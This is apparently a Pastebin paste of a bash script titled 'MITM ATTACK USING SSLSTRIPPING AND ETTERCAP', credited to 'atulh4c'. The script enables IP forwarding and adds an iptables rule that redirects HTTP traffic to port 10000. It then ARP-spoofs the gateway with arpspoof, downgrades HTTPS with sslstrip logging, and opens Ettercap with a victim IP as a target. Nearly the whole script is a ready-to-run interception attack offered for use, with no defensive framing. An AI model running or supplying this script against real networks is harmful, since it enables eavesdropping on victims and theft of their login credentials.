Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #coded by atulh4c
- #automatic in kali linux
- #work in other distros by install kali linux tool
- #need to be in root-mode
- # Colors
- ESC_SEQ="\x1b["
- COL_RESET=$ESC_SEQ"39;49;00m"
- COL_RED=$ESC_SEQ"31;01m"
- COL_GREEN=$ESC_SEQ"32;01m"
- COL_YELLOW=$ESC_SEQ"33;01m"
- COL_BLUE=$ESC_SEQ"34;01m"
- COL_MAGENTA=$ESC_SEQ"35;01m"
- COL_CYAN=$ESC_SEQ"36;01m"
- echo ""
- echo ""
- echo -e " $COL_RED + ====================MITM=================+$COL_RESET"
- echo -e " $COL_BLUE + Created by atulh4c +$COL_RESET"
- echo -e " $COL_RED + =========================================+$COL_RESET"
- echo ""
- echo ""
- echo -e "$COL_MAGENTA #MITM ATTACK USING SSLSTRIPPING AND ETTERCAP $COL_RESET"
- echo ""
- echo -e "$COL_YELLOW #Know your gateway ip"
- echo ""
- echo " #At Ettercap Select Unified Sniffing > Select Interface "
- echo -e " #scan for host > show host list > $COL_RED set gatewayip at targer 1 and victim ip in target 2 $COL_YELLOW"
- echo -e " #Make sure you have edited $COL_CYAN /etc/ettercap/etter.conf (Remove # tag form commands below iptables)$COL_RESET"
- echo""
- echo -e "$COL_RED Press ENTER to continue $COL_RESET"
- read choice
- echo ""
- echo "Enter interface"
- read interface
- echo ""
- echo -e "$COL_MAGENTA Finding gateway ip"
- sleep 1
- echo ""
- route -n
- echo ""
- echo -e "$COL_RESET Enter gateway ip"
- read gip
- echo ""
- echo "Doing ip forward"
- echo 1 > /proc/sys/net/ipv4/ip_forward
- echo ""
- echo "Setting up IP-Tables"
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- echo ""
- echo "Arp spoof the AP"
- sleep 1
- gnome-terminal -e "arpspoof -i $interface $gip"
- sleep 2
- echo "Setting up SSLSTRIP"
- gnome-terminal -e "sslstrip -f -p -k 10000"
- sleep 2
- echo ""
- echo "Launching Ettercap Graphical"
- sleep 1
- ettercap -G
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement